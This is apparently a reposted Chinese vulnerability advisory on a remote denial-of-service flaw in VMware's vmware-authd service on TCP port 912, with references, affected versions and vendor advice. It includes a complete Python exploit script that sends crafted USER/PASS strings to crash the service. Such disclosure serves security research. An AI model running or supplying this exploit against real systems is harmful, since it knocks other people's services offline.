严重影响系统的正常运行:VMware Player远程拒绝服务漏洞公布
当此远程拒绝服务漏洞被利用时,严重影响系统的正常运行,甚至造成停止响应而当机.根据报告,确认VMware Workstation 6.5.3 build 185404和VMware Player 2.5.3 build 185404中的vmware-authd.exe 6.5.3.8888版本受此漏洞影响。其他版本也可能受此漏洞影响。
影响版本:
VMWare Workstation 6.5.3 build 185404
VMWare Player 2.5.3 build 185404漏洞描述:
Bugraq ID: 36630
VMware Player是一款可以让PC用户在Windows或Linux PC上很容易的运行虚拟机的免费软件。VMWare Workstation是一款流行的虚拟机应用程序。
当处理登录请求时VMware授权服务存在错误,通过提交包含 ’\xFF’字符的"USER"或"PASS"字符串给监听在TCP 912端口的"vmware-authd"进程,可导致服务停止响应。
<*参考
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php
http://secunia.com/advisories/36988/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect((host, port))
d = s.recv(1024)
print "Server <- " + d
s.send(’USER \x25\xFF \r\n’)
print ’Sending command "USER" + evil string...’
d = s.recv(1024)
print "Server response <- " + d
s.send(’PASS \x25\xFF \r\n’)
print ’Sending command "PASS" + evil string...’
try:
d = s.recv(1024)
print "Server response <- " + d
except:
print "\nExploit completed..."
except:
print "Something goes wrong honey..."
SEBUG安全建议:
厂商解决方案:
目前没有详细解决方案提供:
http://www.vmware.com/
更多此远程拒绝服务漏洞的问题,请随时关注上面官方网站,是否提供解决方案.
转截请注明:文章来自 pc捍卫者 http://www.pchwz.com
本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点
